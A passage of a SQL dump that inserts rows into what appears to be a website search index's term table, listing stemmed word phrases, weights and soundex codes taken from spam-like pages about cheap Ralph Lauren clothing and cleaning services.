polo',0,1,1.3,'L214',1,'en'),(34216,'like polo ralph','like polo ralph',0,1,1.5,'L214641',1,'en'),(34217,'loaded','load',0,0,0.4,'L300',1,'en'),(34218,'loaded their','load their',0,1,1.4,'L360',1,'en'),(34219,'loaded their wholesale','load their wholesale',0,1,1.7333,'L36424',1,'en'),(34220,'logical','logic',0,0,0.4667,'L240',1,'en'),(34221,'logical and','logic and',0,1,1.3667,'L2453',1,'en'),(34222,'logical and some','logic and some',0,1,1.5333,'L245325',1,'en'),(34223,'long sleeve','long sleeve',0,1,1.3667,'L5241',2,'en'),(34224,'long sleeve for','long sleeve for',0,1,1.5,'L52416',2,'en'),(34225,'long sleeve polo','long sleeve polo',0,1,1.5333,'L52414',2,'en'),(34226,'long sleeve shirts','long sleeve shirts',0,1,1.6,'L52412632',2,'en'),(34227,'look at some','look at some',0,1,1.4,'L2325',1,'en'),(34228,'look at the','look at the',0,1,1.3667,'L230',1,'en'),(34229,'made for','made for',0,1,1.2667,'M316',1,'en'),(34230,'made for men','made for men',0,1,1.4,'M3165',1,'en'),(34231,'main categories','main categories',0,1,1.5,'M23262',1,'en'),(34232,'main categories ralph','main categories ralph',0,1,1.7,'M23262641',1,'en'),(34233,'manage to','manag to',0,1,1.3,'M230',1,'en'),(34234,'manage to work','manag to work',0,1,1.4667,'M2362',1,'en'),(34235,'manufactured','manufactur',0,0,0.8,'M12363',3,'en'),(34236,'manufactured mens','manufactur mens',0,1,1.5667,'M1236352',1,'en'),(34237,'manufactured mens ralph','manufactur mens ralph',0,1,1.7667,'M1236352641',1,'en'),(34238,'masters','master',0,0,0.4667,'M2362',1,'en'),(34239,'masters ralph','master ralph',0,1,1.4333,'M2362641',1,'en'),(34240,'masters ralph lauren','master ralph lauren',0,1,1.6667,'M2362641465',1,'en'),(34241,'materials tools','materi tools',0,1,1.5,'M3642342',1,'en'),(34242,'materials tools and','materi tools and',0,1,1.6333,'M364234253',1,'en'),(34243,'may use','mai use',0,1,1.2333,'M200',1,'en'),(34244,'may use as','mai use as',0,1,1.3333,'M200',1,'en'),(34245,'melbourne','melbourn',0,0,0.6,'M4165',1,'en'),(34246,'melbourne some','melbourn some',0,1,1.4667,'M416525',1,'en'),(34247,'melbourne some are','melbourn some are',0,1,1.6,'M4165256',1,'en'),(34248,'men a','men a',0,1,1.1667,'M000',2,'en'),(34249,'men a womens','men a womens',0,1,1.4,'M200',1,'en'),(34250,'men all','men all',0,1,1.2333,'M400',1,'en'),(34251,'men all this','men all this',0,1,1.4,'M432',1,'en'),(34252,'men amongst','men amongst',0,1,1.3667,'M230',1,'en'),(34253,'men amongst glass','men amongst glass',0,1,1.5667,'M23242',1,'en'),(34254,'men cleaning','men cleaning',0,1,1.4,'M2452',1,'en'),(34255,'men cleaning providers','men cleaning providers',0,1,1.7333,'M2452161362',1,'en'),(34256,'men complete','men complete',0,1,1.4,'M25143',1,'en'),(34257,'men complete them','men complete them',0,1,1.5667,'M251435',1,'en'),(34258,'men for','men for',0,1,1.2333,'M160',2,'en'),(34259,'men for concerning','men for concerning',0,1,1.6,'M16252652',1,'en'),(34260,'men growth','men growth',0,1,1.3333,'M263',1,'en'),(34261,'men growth i','men growth i',0,1,1.4,'M263',1,'en'),(34262,'men is','men is',0,1,1.2,'M200',1,'en'),(34263,'men is business','men is business',0,1,1.5,'M21252',1,'en'),(34264,'men look','men look',0,1,1.2667,'M420',1,'en'),(34265,'men look at','men look at',0,1,1.3667,'M423',1,'en'),(34266,'men not','men not',0,1,1.2333,'M300',1,'en'),(34267,'men not all','men not all',0,1,1.3667,'M340',1,'en'),(34268,'men other','men other',0,1,1.3,'M360',1,'en'),(34269,'men other broad','men other broad',0,1,1.5,'M36163',1,'en'),(34270,'men projects','men projects',0,1,1.4,'M16232',1,'en'),(34271,'men projects they','men projects they',0,1,1.5667,'M162323',1,'en'),(34272,'men s','men s',0,1,1.1667,'M200',2,'en'),(34273,'men s hoodies','men s hoodies',0,1,1.4333,'M232',2,'en'),(34274,'men s sandals','men s sandals',0,1,1.4333,'M25342',1,'en'),(34275,'men s shorts','men s shorts',0,1,1.4,'M2632',1,'en'),(34276,'men s striped','men s striped',0,1,1.4333,'M23613',1,'en'),(34277,'men simplest','men simplest',0,1,1.4,'M251423',1,'en'),(34278,'men simplest to','men simplest to',0,1,1.5,'M251423',1,'en'),(34279,'men soaked','men soaked',0,1,1.3333,'M230',1,'en'),(34280,'men soaked it','men soaked it',0,1,1.4333,'M230',1,'en'),(34281,'men space','men space',0,1,1.3,'M212',1,'en'),(34282,'men space in','men space in',0,1,1.4,'M2125',1,'en'),(34283,'men tasks','men tasks',0,1,1.3,'M320',1,'en'),(34284,'men tasks with','men tasks with',0,1,1.4667,'M323',1,'en'),(34285,'men then','men then',0,1,1.2667,'M350',1,'en'),(34286,'men then the','men then the',0,1,1.4,'M353',1,'en'),(34287,'men things','men things',0,1,1.3333,'M352',1,'en'),(34288,'men things manufactured','men things manufactured',0,1,1.7667,'M352512363',1,'en'),(34289,'men to polo','men to polo',0,1,1.3667,'M314',1,'en'),(34290,'men types','men types',0,1,1.3,'M312',1,'en'),(34291,'men types of','men types of',0,1,1.4,'M3121',1,'en'),(34292,'men water','men water',0,1,1.3,'M360',1,'en'),(34293,'men water in','men water in',0,1,1.4,'M365',1,'en'),(34294,'men whether','men whether',0,1,1.3667,'M360',1,'en'),(34295,'men whether you','men whether you',0,1,1.5,'M360',1,'en'),(34296,'mens','men',0,0,0.2667,'M200',3,'en'),(34297,'mens air','men air',0,1,1.2667,'M260',1,'en'),(34298,'mens air of','men air of',0,1,1.3667,'M261',1,'en'),(34299,'mens allow','men allow',0,1,1.3333,'M240',1,'en'),(34300,'mens allow the','men allow the',0,1,1.4667,'M243',1,'en'),(34301,'mens hoodies','men hoodies',0,1,1.4,'M232',2,'en'),(34302,'mens hoodies online','men hoodies online',0,1,1.6333,'M232545',1,'en'),(34303,'mens hoodies outlet','men hoodies outlet',0,1,1.6333,'M232343',1,'en'),(34304,'mens hoodies up','men hoodies up',0,1,1.5,'M2321',1,'en'),(34305,'mens outlet','men outlet',0,1,1.3667,'M2343',1,'en'),(34306,'mens outlet something','men outlet something',0,1,1.7,'M234325352',1,'en'),(34307,'mens polo','men polo',0,1,1.3,'M214',2,'en'),(34308,'mens polo ralph','men polo ralph',0,1,1.5,'M214641',2,'en'),(34309,'mens purchasing','men purchasing',0,1,1.5,'M216252',1,'en'),(34310,'mens purchasing cheap','men purchasing cheap',0,1,1.7,'M2162521',1,'en'),(34311,'mens ralph','men ralph',0,1,1.3333,'M2641',2,'en'),(34312,'mens ralph lauren','men ralph lauren',0,1,1.5667,'M2641465',2,'en'),(34313,'mens sandals','men sandals',0,1,1.4,'M25342',1,'en'),(34314,'mens sandals astoundingly','men sandals astoundingly',0,1,1.8333,'M25342353524',1,'en'),(34315,'mens sport','men sport',0,1,1.3333,'M2163',1,'en'),(34316,'mens sport shirt','men sport shirt',0,1,1.5333,'M2163263',1,'en'),(34317,'mens striped','men striped',0,1,1.4,'M23613',1,'en'),(34318,'mens striped one','men striped one',0,1,1.5333,'M236135',1,'en'),(34319,'minerals','miner',0,0,0.5333,'M642',1,'en'),(34320,'minerals are','miner are',0,1,1.4,'M6426',1,'en'),(34321,'minerals are taken','miner are taken',0,1,1.6,'M6426325',1,'en'),(34322,'minute','minut',0,0,0.4,'M300',1,'en'),(34323,'minute to','minut to',0,1,1.3,'M300',1,'en'),(34324,'minute to soak','minut to soak',0,1,1.4667,'M320',1,'en'),(34325,'minutes','minut',0,0,0.4667,'M320',1,'en'),(34326,'minutes ralph','minut ralph',0,1,1.4333,'M32641',1,'en'),(34327,'minutes ralph lauren','minut ralph lauren',0,1,1.6667,'M32641465',1,'en'),(34328,'more so','more so',0,1,1.2333,'M620',1,'en'),(34329,'more so for','more so for',0,1,1.3667,'M6216',1,'en'),(34330,'much old','much old',0,1,1.2667,'M243',1,'en'),(34331,'much old clean','much old clean',0,1,1.4667,'M243245',1,'en'),(34332,'natural','natur',0,0,0.4667,'N364',1,'en'),(34333,'natural and','natur and',0,1,1.3667,'N36453',1,'en'),(34334,'natural and scientific','natur and scientific',0,1,1.7333,'N3645325312',1,'en'),(34335,'nature','natur',0,0,0.4,'N360',1,'en'),(34336,'nature along','natur along',0,1,1.4,'N36452',1,'en'),(34337,'nature along with','natur along with',0,1,1.5667,'N364523',1,'en'),(34338,'nature exists','natur exists',0,1,1.4333,'N36232',1,'en'),(34339,'nature exists and','natur exists and',0,1,1.5667,'N3623253',1,'en'),(34340,'necessary','necessari',0,0,0.6,'N260',1,'en'),(34341,'necessary for','necessari for',0,1,1.4333,'N2616',1,'en'),(34342,'necessary for any','necessari for any',0,1,1.5667,'N26165',1,'en'),(34343,'need not','need not',0,1,1.2667,'N353',1,'en'),(34344,'need not invest','need not invest',0,1,1.5,'N3535123',1,'en'),(34345,'needs ralph','need ralph',0,1,1.3667,'N32641',1,'en'),(34346,'needs ralph lauren','need ralph lauren',0,1,1.6,'N32641465',1,'en'),(34347,'no residue','no residue',0,1,1.3333,'N623',1,'en'),(34348,'no residue related','no residue related',0,1,1.6,'N623643',1,'en'),(34349,'non zero','non zero',0,1,1.2667,'N260',1,'en'),(34350,'non zero mens','non zero mens',0,1,1.4333,'N2652',1,'en'),(34351,'normal business','normal business',0,1,1.5,'N6541252',1,'en'),(34352,'normal business indeed','normal business indeed',0,1,1.7333,'N654125253',1,'en'),(34353,'not all','not all',0,1,1.2333,'N340',1,'en'),(34354,'not all ralph','not all ralph',0,1,1.4333,'N34641',1,'en'),(34355,'not invest','not invest',0,1,1.3333,'N35123',1,'en'),(34356,'not invest for','not invest for',0,1,1.4667,'N3512316',1,'en'),(34357,'not polo','not polo',0,1,1.2667,'N314',1,'en'),(34358,'not polo ralph','not polo ralph',0,1,1.4667,'N314641',1,'en'),(34359,'now that','now that',0,1,1.2667,'N300',1,'en'),(34360,'now that ralph','now that ralph',0,1,1.4667,'N3641',1,'en'),(34361,'now we','now we',0,1,1.2,'N000',1,'en'),(34362,'now we evaluate','now we evaluate',0,1,1.5,'N143',1,'en'),(34363,'occupies','occupi',0,0,0.5333,'O212',1,'en'),(34364,'occupies cheap','occupi cheap',0,1,1.4667,'O2121',1,'en'),(34365,'occupies cheap ralph','occupi cheap ralph',0,1,1.6667,'O2121641',1,'en'),(34366,'of agencies','of agencies',0,1,1.3667,'O1252',1,'en'),(34367,'of agencies that','of agencies that',0,1,1.5333,'O12523',1,'en'),(34368,'of bottle','of bottle',0,1,1.3,'O134',1,'en'),(34369,'of bottle of','of bottle of',0,1,1.4,'O1341',1,'en'),(34370,'of business','of business',0,1,1.3667,'O1252',1,'en'),(34371,'of business cheap','of business cheap',0,1,1.5667,'O12521',1,'en'),(34372,'of business cleaning','of business cleaning',0,1,1.6667,'O1252452',1,'en'),(34373,'of course','of course',0,1,1.3,'O1262',1,'en'),(34374,'of course the','of course the',0,1,1.4333,'O12623',1,'en'),(34375,'of fresh','of fresh',0,1,1.2667,'O162',1,'en'),(34376,'of fresh water','of fresh water',0,1,1.4667,'O16236',1,'en'),(34377,'of holding','of holding',0,1,1.3333,'O14352',1,'en'),(34378,'of holding a','of holding a',0,1,1.4,'O14352',1,'en'),(34379,'of professionalism','of professionalism',0,1,1.6,'O16125425',1,'en'),(34380,'of professionalism and','of professionalism and',0,1,1.7333,'O161254253',1,'en'),(34381,'of service','of service',0,1,1.3333,'O12612',1,'en'),(34382,'of service they','of service they',0,1,1.5,'O126123',1,'en'),(34383,'of soap','of soap',0,1,1.2333,'O121',1,'en'),(34384,'of soap and','of soap and',0,1,1.3667,'O12153',1,'en'),(34385,'of spray','of spray',0,1,1.2667,'O1216',1,'en'),(34386,'of spray or','of spray or',0,1,1.3667,'O1216',1,'en'),(34387,'of the carpet','of the carpet',0,1,1.4333,'O132613',1,'en'),(34388,'of the ralph','of the ralph',0,1,1.4,'O13641',1,'en'),(34389,'of the requirement','of the requirement',0,1,1.6,'O1362653',1,'en'),(34390,'of the time','of the time',0,1,1.3667,'O135',1,'en'),(34391,'of the wholesale','of the wholesale',0,1,1.5333,'O13424',1,'en'),(34392,'of vinegar','of vinegar',0,1,1.3333,'O1526',1,'en'),(34393,'of vinegar some','of vinegar some',0,1,1.5,'O152625',1,'en'),(34394,'of work polo','of work polo',0,1,1.4,'O16214',1,'en'),(34395,'off this','off this',0,1,1.2667,'O132',1,'en'),(34396,'off this leaves','off this leaves',0,1,1.5,'O132412',1,'en'),(34397,'office windows','offic windows',0,1,1.4667,'O12532',1,'en'),(34398,'office windows which','offic windows which',0,1,1.6667,'O12532',1,'en'),(34399,'okay fold','okai fold',0,1,1.3,'O2143',1,'en'),(34400,'okay fold a','okai fold a',0,1,1.3667,'O2143',1,'en'),(34401,'old clean','old clean',0,1,1.3,'O43245',1,'en'),(34402,'old clean thick','old clean thick',0,1,1.5,'O4324532',1,'en'),(34403,'on sale','on sale',0,1,1.2333,'O524',1,'en'),(34404,'on sale cleansing','on sale cleansing',0,1,1.5667,'O524245252',1,'en'),(34405,'on smaller','on smaller',0,1,1.3333,'O52546',1,'en'),(34406,'on smaller home','on smaller home',0,1,1.5,'O525465',1,'en'),(34407,'one with','on with',0,1,1.2667,'O530',1,'en'),(34408,'one with the','on with the',0,1,1.4,'O530',1,'en'),(34409,'online also','onlin also',0,1,1.3667,'O54542',1,'en'),(34410,'online also business','onlin also business',0,1,1.6667,'O545421252',1,'en'),(34411,'online carpet','onlin carpet',0,1,1.4333,'O5452613',1,'en'),(34412,'online carpet with','onlin carpet with',0,1,1.6,'O5452613',1,'en'),(34413,'online fresh','onlin fresh',0,1,1.4,'O545162',1,'en'),(34414,'online fresh stains','onlin fresh stains',0,1,1.6333,'O545162352',1,'en'),(34415,'online place','onlin place',0,1,1.4,'O545142',1,'en'),(34416,'online place of','onlin place of',0,1,1.5,'O5451421',1,'en'),(34417,'online section','onlin section',0,1,1.4667,'O545235',1,'en'),(34418,'online section of','onlin section of',0,1,1.5667,'O5452351',1,'en'),(34419,'online weight','onlin weight',0,1,1.4333,'O54523',1,'en'),(34420,'online weight into','onlin weight into',0,1,1.6,'O5452353',1,'en'),(34421,'operate','oper',0,0,0.4667,'O163',1,'en'),(34422,'operate across','oper across',0,1,1.4667,'O163262',1,'en'),(34423,'operate across residential','oper across residential',0,1,1.8667,'O163262623534',1,'en'),(34424,'optimal','optim',0,0,0.4667,'O1354',1,'en'),(34425,'optimal solutions','optim solutions',0,1,1.5667,'O135424352',1,'en'),(34426,'optimal solutions is','optim solutions is',0,1,1.6667,'O135424352',1,'en'),(34427,'or business','or business',0,1,1.3667,'O61252',1,'en'),(34428,'or business in','or business in',0,1,1.4667,'O612525',1,'en'),(34429,'or cleaning','or cleaning',0,1,1.3667,'O62452',1,'en'),(34430,'or cleaning chemicals','or cleaning chemicals',0,1,1.7,'O624525242',1,'en'),(34431,'or cloth','or cloth',0,1,1.2667,'O6243',1,'en'),(34432,'or cloth and','or cloth and',0,1,1.4,'O624353',1,'en'),(34433,'or commercial','or commercial',0,1,1.4333,'O625624',1,'en'),(34434,'or commercial cheap','or commercial cheap',0,1,1.6333,'O62562421',1,'en'),(34435,'or get','or get',0,1,1.2,'O623',1,'en'),(34436,'or get in','or get in',0,1,1.3,'O6235',1,'en'),(34437,'or sponge','or sponge',0,1,1.3,'O62152',1,'en'),(34438,'or sponge or','or sponge or',0,1,1.4,'O621526',1,'en'),(34439,'or wooden','or wooden',0,1,1.3,'O635',1,'en'),(34440,'or wooden boards','or wooden boards',0,1,1.5333,'O6351632',1,'en'),(34441,'ordinary','ordinari',0,0,0.5333,'O6356',1,'en'),(34442,'ordinary faucet','ordinari faucet',0,1,1.5,'O6356123',1,'en'),(34443,'ordinary faucet water','ordinari faucet water',0,1,1.7,'O63561236',1,'en'),(34444,'other broad','other broad',0,1,1.3667,'O36163',1,'en'),(34445,'other broad cheap','other broad cheap',0,1,1.5667,'O3616321',1,'en'),(34446,'ought','ought',0,0,0.3333,'O230',1,'en'),(34447,'ought to','ought to',0,1,1.2667,'O230',1,'en'),(34448,'ought to be','ought to be',0,1,1.3667,'O231',1,'en'),(34449,'out there','out there',0,1,1.3,'O360',1,'en'),(34450,'out there flip','out there flip',0,1,1.4667,'O36141',1,'en'),(34451,'outlet actually','outlet actually',0,1,1.5,'O343234',1,'en'),(34452,'outlet actually then','outlet actually then',0,1,1.6667,'O34323435',1,'en'),(34453,'outlet for','outlet for',0,1,1.3333,'O34316',1,'en'),(34454,'outlet for a','outlet for a',0,1,1.4,'O34316',1,'en'),(34455,'outlet something','outlet something',0,1,1.5333,'O34325352',1,'en'),(34456,'outlet something that','outlet something that',0,1,1.7,'O343253523',1,'en'),(34457,'outlet that','outlet that',0,1,1.3667,'O343',1,'en'),(34458,'outlet that the','outlet that the',0,1,1.5,'O343',1,'en'),(34459,'outlet the','outlet the',0,1,1.3333,'O343',1,'en'),(34460,'outlet the reason','outlet the reason',0,1,1.5667,'O343625',1,'en'),(34461,'over all','over all',0,1,1.2667,'O164',1,'en'),(34462,'over all stain','over all stain',0,1,1.4667,'O164235',1,'en'),(34463,'own mens','own mens',0,1,1.2667,'O520',1,'en'),(34464,'own mens ralph','own mens ralph',0,1,1.4667,'O52641',1,'en'),(34465,'pain','pain',0,0,0.2667,'P500',1,'en'),(34466,'pain for','pain for',0,1,1.2667,'P516',1,'en'),(34467,'pain for mens','pain for mens',0,1,1.4333,'P51652',1,'en'),(34468,'particles','particl',0,0,0.6,'P63242',1,'en'),(34469,'particles and','particl and',0,1,1.4333,'P6324253',1,'en'),(34470,'particles and minerals','particl and minerals',0,1,1.7333,'P63242535642',1,'en'),(34471,'particular ralph','particular ralph',0,1,1.5333,'P6324641',1,'en'),(34472,'particular ralph lauren','particular ralph lauren',0,1,1.7667,'P6324641465',1,'en'),(34473,'perfectly ralph','perfectli ralph',0,1,1.5,'P61234641',1,'en'),(34474,'perfectly ralph lauren','perfectli ralph lauren',0,1,1.7333,'P61234641465',1,'en'),(34475,'periodicities','period',0,0,0.8667,'P63232',1,'en'),(34476,'periodicities then','period then',0,1,1.6,'P6323235',1,'en'),(34477,'periodicities then ralph','period then ralph',0,1,1.8,'P6323235641',1,'en'),(34478,'place of','place of',0,1,1.2667,'P421',1,'en'),(34479,'place of work','place of work',0,1,1.4333,'P42162',1,'en'),(34480,'polo accessories','polo accessories',0,1,1.5333,'P4262',1,'en'),(34481,'polo accessories own','polo accessories own',0,1,1.6667,'P42625',1,'en'),(34482,'polo apparatus','polo apparatus',0,1,1.4667,'P41632',1,'en'),(34483,'polo apparatus well','polo apparatus well',0,1,1.6333,'P416324',1,'en'),(34484,'polo are','polo are',0,1,1.2667,'P460',1,'en'),(34485,'polo are cheap','polo are cheap',0,1,1.4667,'P4621',1,'en'),(34486,'polo bags','polo bags',0,1,1.3,'P412',2,'en'),(34487,'polo bags for','polo bags for',0,1,1.4333,'P41216',2,'en'),(34488,'polo belts','polo belts',0,1,1.3333,'P41432',1,'en'),(34489,'polo belts for','polo belts for',0,1,1.4667,'P4143216',1,'en'),(34490,'polo belts or','polo belts or',0,1,1.4333,'P414326',1,'en'),(34491,'polo boys','polo boys',0,1,1.3,'P412',1,'en'),(34492,'polo boys occupies','polo boys occupies',0,1,1.6,'P41212',1,'en'),(34493,'polo cheap','polo cheap',0,1,1.3333,'P421',1,'en'),(34494,'polo cheap inventory','polo cheap inventory',0,1,1.6667,'P42151536',1,'en'),(34495,'polo classic','polo classic',0,1,1.4,'P4242',1,'en'),(34496,'polo classic fit','polo classic fit',0,1,1.5333,'P424213',1,'en'),(34497,'polo dress','polo dress',0,1,1.3333,'P4362',1,'en'),(34498,'polo dress shirts','polo dress shirts',0,1,1.5667,'P4362632',1,'en'),(34499,'polo for','polo for',0,1,1.2667,'P416',2,'en'),(34500,'polo for kids','polo for kids',0,1,1.4333,'P416232',1,'en'),(34501,'polo for men','polo for men',0,1,1.4,'P4165',2,'en'),(34502,'polo handbags','polo handbags',0,1,1.4333,'P45312',2,'en'),(34503,'polo handbags on','polo handbags on',0,1,1.5333,'P453125',1,'en'),(34504,'polo hats','polo hats',0,1,1.3,'P432',1,'en'),(34505,'polo hats sale','polo hats sale',0,1,1.4667,'P4324',1,'en'),(34506,'polo hats these','polo hats these',0,1,1.5,'P43232',1,'en'),(34507,'polo italia blemish','polo italia blemish',0,1,1.6333,'P4341452',1,'en'),(34508,'polo logical','polo logical',0,1,1.4,'P424',1,'en'),(34509,'polo logical and','polo logical and',0,1,1.5333,'P42453',1,'en'),(34510,'polo mens','polo mens',0,1,1.3,'P452',2,'en'),(34511,'polo mens allow','polo mens allow',0,1,1.5,'P4524',1,'en'),(34512,'polo scarves','polo scarves',0,1,1.4,'P42612',2,'en'),(34513,'polo scarves your','polo scarves your',0,1,1.5667,'P426126',1,'en'),(34514,'polo shirts','polo shirts',0,1,1.3667,'P42632',2,'en'),(34515,'polo shirts bath','polo shirts bath',0,1,1.5333,'P4263213',1,'en'),(34516,'polo shirts for','polo shirts for',0,1,1.5,'P4263216',1,'en'),(34517,'polo shirts outlet','polo shirts outlet',0,1,1.6,'P42632343',2,'en'),(34518,'polo shirts regards','polo shirts regards',0,1,1.6333,'P4263262632',1,'en'),(34519,'polo shirts wholesale','polo shirts wholesale',0,1,1.7,'P42632424',1,'en'),(34520,'polo shoes','polo shoes',0,1,1.3333,'P420',1,'en'),(34521,'polo shoes for','polo shoes for',0,1,1.4667,'P4216',1,'en'),(34522,'polo sport','polo sport',0,1,1.3333,'P42163',2,'en'),(34523,'polo sport shirt','polo sport shirt',0,1,1.5333,'P42163263',2,'en'),(34524,'polo sweaters','polo sweaters',0,1,1.4333,'P42362',1,'en'),(34525,'polo sweaters for','polo sweaters for',0,1,1.5667,'P4236216',1,'en'),(34526,'polo womens','polo womens',0,1,1.3667,'P452',1,'en'),(34527,'polo womens chore','polo womens chore',0,1,1.5667,'P4526',1,'en'),(34528,'polos','polo',0,0,0.3333,'P420',1,'en'),(34529,'polos for','polo for',0,1,1.3,'P4216',1,'en'),(34530,'polos for men','polo for men',0,1,1.4333,'P42165',1,'en'),(34531,'polos for women','polo for women',0,1,1.5,'P42165',1,'en'),(34532,'positive basic','posit basic',0,1,1.4667,'P2312',1,'en'),(34533,'positive basic materials','posit basic materials',0,1,1.8,'P231253642',1,'en'),(34534,'practical','practic',0,0,0.6,'P62324',1,'en'),(34535,'practical quickly','practic quickly',0,1,1.5667,'P6232424',1,'en'),(34536,'practical quickly will','practic quickly will',0,1,1.7333,'P6232424',1,'en'),(34537,'preventable','prevent',0,0,0.7333,'P615314',1,'en'),(34538,'preventable polo','prevent polo',0,1,1.5333,'P61531414',1,'en'),(34539,'preventable polo ralph','prevent polo ralph',0,1,1.7333,'P61531414641',1,'en'),(34540,'procedures ralph','procedur ralph',0,1,1.5333,'P62362641',1,'en'),(34541,'procedures ralph lauren','procedur ralph lauren',0,1,1.7667,'P62362641465',1,'en'),(34542,'procurement','procur',0,0,0.7333,'P62653',1,'en'),(34543,'procurement of','procur of',0,1,1.4667,'P626531',1,'en'),(34544,'procurement of business','procur of business',0,1,1.7667,'P626531252',1,'en'),(34545,'professional','profession',0,0,0.8,'P61254',2,'en'),(34546,'professional cleaners','profession cleaners',0,1,1.7,'P6125424562',1,'en'),(34547,'professional cleaners constantly','profession cleaners constantly',0,1,2,'P6125424562523534',1,'en'),(34548,'professional ralph','profession ralph',0,1,1.6,'P61254641',1,'en'),(34549,'professional ralph lauren','profession ralph lauren',0,1,1.8333,'P61254641465',1,'en'),(34550,'professionalism','profession',0,0,1,'P6125425',1,'en'),(34551,'professionalism and','profession and',0,1,1.6333,'P61254253',1,'en'),(34552,'professionalism and reliability','profession and reliability',0,1,2,'P6125425364143',1,'en'),(34553,'projects','project',0,0,0.5333,'P6232',1,'en'),(34554,'projects they','project they',0,1,1.4333,'P62323',1,'en'),(34555,'projects they would','project they would',0,1,1.6333,'P6232343',1,'en'),(34556,'property','properti',0,0,0.5333,'P6163',1,'en'),(34557,'property ralph','properti ralph',0,1,1.4667,'P6163641',1,'en'),(34558,'property ralph lauren','properti ralph lauren',0,1,1.7,'P6163641465',1,'en'),(34559,'providers','provid',0,0,0.6,'P61362',1,'en'),(34560,'providers out','provid out',0,1,1.4333,'P613623',1,'en'),(34561,'providers out there','provid out there',0,1,1.6333,'P6136236',1,'en'),(34562,'purchasing','purchas',0,0,0.6667,'P6252',3,'en'),(34563,'purchasing cheap','purchas cheap',0,1,1.5333,'P62521',1,'en'),(34564,'purchasing cheap polo','purchas cheap polo',0,1,1.7,'P625214',1,'en'),(34565,'quality cleanup','qualiti cleanup',0,1,1.5,'Q432451',1,'en'),(34566,'quality cleanup to','qualiti cleanup to',0,1,1.6,'Q4324513',1,'en'),(34567,'quickly will','quickli will',0,1,1.4,'Q400',1,'en'),(34568,'quickly will come','quickli will come',0,1,1.5667,'Q425',1,'en'),(34569,'ralph lauren accessories','ralph lauren accessories',0,1,1.8,'R41465262',1,'en'),(34570,'ralph lauren bags','ralph lauren bags',0,1,1.5667,'R4146512',1,'en'),(34571,'ralph lauren belts','ralph lauren belts',0,1,1.6,'R414651432',1,'en'),(34572,'ralph lauren custom','ralph lauren custom',0,1,1.6333,'R41465235',1,'en'),(34573,'ralph lauren dress','ralph lauren dress',0,1,1.6,'R41465362',2,'en'),(34574,'ralph lauren ensure','ralph lauren ensure',0,1,1.6333,'R4146526',1,'en'),(34575,'ralph lauren for','ralph lauren for',0,1,1.5333,'R4146516',1,'en'),(34576,'ralph lauren girls','ralph lauren girls',0,1,1.6,'R414652642',1,'en'),(34577,'ralph lauren handbags','ralph lauren handbags',0,1,1.7,'R41465312',1,'en'),(34578,'ralph lauren hats','ralph lauren hats',0,1,1.5667,'R4146532',1,'en'),(34579,'ralph lauren hooded','ralph lauren hooded',0,1,1.6333,'R414653',2,'en'),(34580,'ralph lauren hoodies','ralph lauren hoodies',0,1,1.6667,'R4146532',2,'en'),(34581,'ralph lauren jackets','ralph lauren jackets',0,1,1.6667,'R41465232',1,'en'),(34582,'ralph lauren long','ralph lauren long',0,1,1.5667,'R41465452',2,'en'),(34583,'ralph lauren men','ralph lauren men',0,1,1.5333,'R41465',2,'en'),(34584,'ralph lauren mens','ralph lauren mens',0,1,1.5667,'R414652',2,'en'),(34585,'ralph lauren polos','ralph lauren polos',0,1,1.6,'R41465142',1,'en'),(34586,'ralph lauren sandals','ralph lauren sandals',0,1,1.6667,'R4146525342',2,'en'),(34587,'ralph lauren scarves','ralph lauren scarves',0,1,1.6667,'R414652612',2,'en'),(34588,'ralph lauren shirts','ralph lauren shirts',0,1,1.6333,'R414652632',1,'en'),(34589,'ralph lauren shoes','ralph lauren shoes',0,1,1.6,'R414652',2,'en'),(34590,'ralph lauren shorts','ralph lauren shorts',0,1,1.6333,'R414652632',2,'en'),(34591,'ralph lauren sport','ralph lauren sport',0,1,1.6,'R414652163',2,'en'),(34592,'ralph lauren striped','ralph lauren striped',0,1,1.6667,'R4146523613',1,'en'),(34593,'ralph lauren sweaters','ralph lauren sweaters',0,1,1.7,'R414652362',2,'en'),(34594,'ralph lauren women','ralph lauren women',0,1,1.6,'R41465',2,'en'),(34595,'ralph lauren womens','ralph lauren womens',0,1,1.6333,'R414652',2,'en'),(34596,'reason','reason',0,0,0.4,'R250',1,'en'),(34597,'reason mens','reason mens',0,1,1.3667,'R252',1,'en'),(34598,'reason mens ralph','reason mens ralph',0,1,1.5667,'R252641',1,'en'),(34599,'reason ought','reason ought',0,1,1.4,'R2523',1,'en'),(34600,'reason ought to','reason ought to',0,1,1.5,'R2523',1,'en'),(34601,'regard to you','regard to you',0,1,1.4333,'R263',1,'en'),(34602,'regards','regard',0,0,0.4667,'R2632',1,'en'),(34603,'regards to','regard to',0,1,1.3333,'R26323',1,'en'),(34604,'regards to minute','regard to minute',0,1,1.5667,'R2632353',1,'en'),(34605,'regular','regular',0,0,0.4667,'R246',1,'en'),(34606,'regular cleaning','regular cleaning',0,1,1.5333,'R2462452',1,'en'),(34607,'regular cleaning chores','regular cleaning chores',0,1,1.7667,'R246245262',1,'en'),(34608,'regular cleaning is','regular cleaning is',0,1,1.6333,'R2462452',1,'en'),(34609,'related to the','relat to the',0,1,1.4667,'R430',1,'en'),(34610,'relationship','relationship',0,0,0.8,'R43521',1,'en'),(34611,'relationship is','relationship is',0,1,1.5,'R435212',1,'en'),(34612,'relationship is usually','relationship is usually',0,1,1.7667,'R4352124',1,'en'),(34613,'reliability','reliabl',0,0,0.7333,'R4143',1,'en'),(34614,'reliability now','reliabl now',0,1,1.5,'R41435',1,'en'),(34615,'reliability now we','reliabl now we',0,1,1.6,'R41435',1,'en'),(34616,'require','requir',0,0,0.4667,'R260',1,'en'),(34617,'require professional','requir professional',0,1,1.6667,'R26161254',1,'en'),(34618,'require professional ralph','requir professional ralph',0,1,1.8667,'R26161254641',1,'en'),(34619,'required for any','requir for any',0,1,1.5333,'R263165',1,'en'),(34620,'requirement involving','requir involving',0,1,1.7,'R2653514152',1,'en'),(34621,'requirement involving cleaning','requir involving cleaning',0,1,2,'R2653514152452',1,'en'),(34622,'residential','residenti',0,0,0.7333,'R23534',1,'en'),(34623,'residential or','residenti or',0,1,1.4667,'R235346',1,'en'),(34624,'residential or commercial','residenti or commercial',0,1,1.8333,'R23534625624',1,'en'),(34625,'residue','residu',0,0,0.4667,'R230',1,'en'),(34626,'residue related','residu related',0,1,1.5,'R23643',1,'en'),(34627,'residue related to','residu related to',0,1,1.6,'R23643',1,'en'),(34628,'s dresses','s dresses',0,1,1.3,'S362',1,'en'),(34629,'s dresses going','s dresses going',0,1,1.5,'S36252',1,'en'),(34630,'s hoodies','s 